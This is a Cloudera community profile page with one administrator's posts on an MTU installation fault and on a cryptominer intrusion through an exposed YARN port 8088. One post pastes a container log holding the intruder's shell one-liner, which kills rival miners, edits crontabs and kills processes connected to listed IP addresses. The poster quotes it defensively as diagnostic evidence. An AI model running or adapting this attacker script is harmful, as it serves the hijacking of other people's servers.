About ChrisNeal

ChrisNeal · ‎08-17-2018

Confirmed. This was the issue. Closing the firewall to port 8088 from outside traffic kept this from happening again, along with removing the rogue cron entry in the yarn user's crontab file, and killing those yarn processes. Chris

ChrisNeal · ‎08-16-2018

Yup. Looks like this is the culprit: https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html I found an entry in the security group that needed updating. I'm thinking this will fix the problem. Will post back one more time with a confirmation.

ChrisNeal · ‎08-16-2018

More info: I found this: https://community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html which is exactly what is happening to me. Apparently my Security Groups in AWS need to be tightened somehow? I'm not sure how this is happening...yet.

ChrisNeal · ‎08-16-2018

Sorry, I should have also mentioned that I did verify that port 2049 is not blocked at the firewall with the unix "nc" command. Also, interesting enough, even after stopping the YARN service in CM, the jobs kept spawing. I inspected the process that's running, and it's an odd one (to me): yarn 28333 1 99 19:59 ? 09:47:22 /var/tmp/java -c /var/tmp/w.conf I don't know why there is a "java" in var/tmp, and there was no "w.conf" file there either. The mystery continues...

ChrisNeal · ‎08-16-2018

Hi everyone, I'm fairly familiar with Cloudera Hadoop, but this one is stumping me. I installed a fresh copy of CM 5.15.0 on newly provisioned hardware today: Version: Cloudera Express 5.15.0 Java VM Name: Java HotSpot(TM) 64-Bit Server VM Java VM Vendor: Oracle Corporation Java Version: 1.7.0_67 It's running CDH5 version: 5.15.0-1.cdh5.15.0.p0.21 When I spun up the cluster, I noticed that the Cluster CPU was pegged at 100%. Odd, since nothing should be running here yet. A quick look at "top" on the datanodes showed yarn processes on each taking tons of CPU: top - 20:57:28 up 3:20, 1 user, load average: 39.26, 39.38, 38.46 Tasks: 408 total, 1 running, 407 sleeping, 0 stopped, 0 zombie Cpu(s): 28.6%us, 0.2%sy, 0.0%ni, 71.2%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Mem: 30794896k total, 4898532k used, 25896364k free, 123248k buffers Swap: 0k total, 0k used, 0k free, 2963828k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 26355 yarn 20 0 391m 27m 584 S 549.0 0.1 303:19.37 java 26273 yarn 20 0 391m 27m 588 S 515.6 0.1 303:23.67 java 26313 yarn 20 0 391m 27m 584 S 512.9 0.1 303:33.08 java These are 16 core servers, so a load average of 39.26 is crazy high. I then checked the YARN -> Applications tab in CM, and there are ~40 jobs a minute being spawned and failing with this info: ID: application_1534449578775_0528 Type: YARN User: dr.who Pool: root.users.dr_dot_who Duration: 25.9s Allocated Memory Seconds: 10.5K Allocated VCore Seconds: 10 Every one of them has this error under "Application Details" ================================================================= Application application_1534449578775_0528 failed 2 times due to AM Container for appattempt_1534449578775_0528_000002 exited with exitCode: 123 For more detailed output, check application tracking page:http://bddevh01.dbhotelcloud.com:8088/proxy/application_1534449578775_0528/Then, click on links to logs of each attempt. Diagnostics: Exception from container-launch. Container id: container_1534449578775_0528_02_000001 Exit code: 123 Exception message: bash: no job control in this shell bash-4.1$ for i in {1..60}; do ps ax|grep ff.sh|awk '{print $1}'|xargs ps -o ppi d=|xargs kill -9; done;pgrep -f "sh \./a[[:digit:]]{1,}$"|xargs kill -9;ps ax|gr ep "./no1\|sssshd\|terty\|asdfsd\|qwefdas\|piois"|grep -v grep | awk '{print $1} ' | xargs kill -9;ps ax|grep "./uiiu"|grep -v grep | awk '{print $1}' | xargs ki ll -9;ps ax|grep "./noda\|./manager"|grep sh|grep -v grep | awk '{print $1}' | x args kill -9;ps ax|grep "./noss"|grep -v grep | awk '{print $1}' | xargs kill -9 ;crontab -l | sed '/tmp/d' | crontab -;crontab -l | sed '/jpg/d' | crontab -;cro ntab -l | sed '/png/d' | crontab -;netstat -antp | grep '158.69.133.20\|192.99.1 42.249\|202.144.193.110\|192.99.142.225\|192.99.142.246\|46.4.200.177\|192.99.14 2.250\|46.4.200.179\|192.99.142.251\|46.4.200.178\|159.65.202.177\|185.92.223.19 0\|222.187.232.9' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] usage: kill [ -s signal | -p ] [ -a ] pid ... <snip> kill -l [ signal ] (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) usage: kill [ -s signal | -p ] [ -a ] pid ... kill -l [ signal ] bash-4.1$ exit at org.apache.hadoop.util.Shell.runCommand(Shell.java:604) at org.apache.hadoop.util.Shell.run(Shell.java:507) at org.apache.hadoop.util.Shell$ShellCommandExecutor.execute(Shell.java:789) at org.apache.hadoop.yarn.server.nodemanager.DefaultContainerExecutor.launchContainer(DefaultContainerExecutor.java:213) at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:302) at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:82) at java.util.concurrent.FutureTask.run(FutureTask.java:262) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:745) Container exited with a non-zero exit code 123 Failing this attempt. Failing the application. ================================================================= Does anyone know what this job is, or why it is getting this exception: Exception message: bash: no job control in this shell I've googled that error, but the results haven't led me in a direction that I can determine the root cause here. Thank you SO MUCH for your time and suggestions... Chris

ChrisNeal · ‎05-07-2016

Just one last reply to confirm that an improper switch configuration was the issue here. Once that was fixed, everything worked great! Thanks again for all the help. Chris

ChrisNeal · ‎05-03-2016

Well, it seems the network guy has gone home for the day, so I set all the MTUs to 1500 between the CM server host and one agent server, and everything is working great. 🙂 🙂 Michalis, thank you again for taking the time to read my extra long posts and get me past this issue. I'll have the network guy check the switches and firewall configuration and find out where the problem is ASAP tomorrow. One more post back telling what the final issue ends up being. Thanks again. Chris

ChrisNeal · ‎05-03-2016

Ahhh....I think you are on to something for sure! </happy_dance> chris.neal@bdprodm09:[65]:~> ping -M do -s 8972 172.0.30.2 PING 172.0.30.2 (172.0.30.2) 8972(9000) bytes of data. ^C --- 172.0.30.2 ping statistics --- 2 packets transmitted, 0 received, 100% packet loss, time 1574ms I'm going to ping our network guy and have him validate the switch configurations. Thank you thank you thank you. 🙂 I'll report back soon, I hope! Chris

ChrisNeal · ‎05-03-2016

Thanks again 🙂 It's a bonded 4x10Gb with an MTU of 9000. bond0 Link encap:Ethernet HWaddr A0:36:9F:96:76:F4 inet addr:172.0.30.2 Bcast:172.0.30.255 Mask:255.255.255.0 inet6 addr: fe80::a236:9fff:fe96:76f4/64 Scope:Link UP BROADCAST RUNNING MASTER MULTICAST MTU:9000 Metric:1 RX packets:8750 errors:0 dropped:0 overruns:0 frame:0 TX packets:1500 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:616956 (602.4 KiB) TX bytes:259076 (253.0 KiB) Chris

ChrisNeal · ‎05-03-2016

Thanks for the reply Michalis! /tmp is 777: root@bdprodm10:[134]:/tmp> ls -la total 203756 drwxrwxrwt. 14 root root 4096 May 3 20:41 . I noticed on a working CM install that the next step in the install process is a CHMOD step that I never reach, because the COPY step never completes. I think that is why the permissions are 644 on the .sh file, and 700 on the directory itself: root@bdprodm10:[136]:/tmp> ls -l | grep scm_prepare_node.mWfGt4sr drwx------ 2 cminstall cminstall 4096 May 3 20:22 scm_prepare_node.mWfGt4sr root@bdprodm10:[137]:/tmp> ls -l scm_prepare_node.mWfGt4sr total 0 -rw-r--r-- 1 cminstall cminstall 0 May 3 20:22 scm_prepare_node.sh Again, thank you for your help!

Online	Offline
Last Visited	‎09-04-2018 04:08 PM

Member Since	‎05-02-2016 02:52 PM
Last Visited	‎09-04-2018 04:08 PM
Posts	19
Kudos received	1

Cloudera Community

Re: Help please: Continuous YARN jobs failing with...

Re: Help please: Continuous YARN jobs failing with...

Re: Help please: Continuous YARN jobs failing with...

Re: Help please: Continuous YARN jobs failing with...

Re: Help please: Continuous YARN jobs failing with...

Help please: Continuous YARN jobs failing with Exc...

Re: CM cannot copy installation files to other ser...

Re: CM cannot copy installation files to other ser...

Re: CM cannot copy installation files to other ser...

Re: CM cannot copy installation files to other ser...

Re: CM cannot copy installation files to other ser...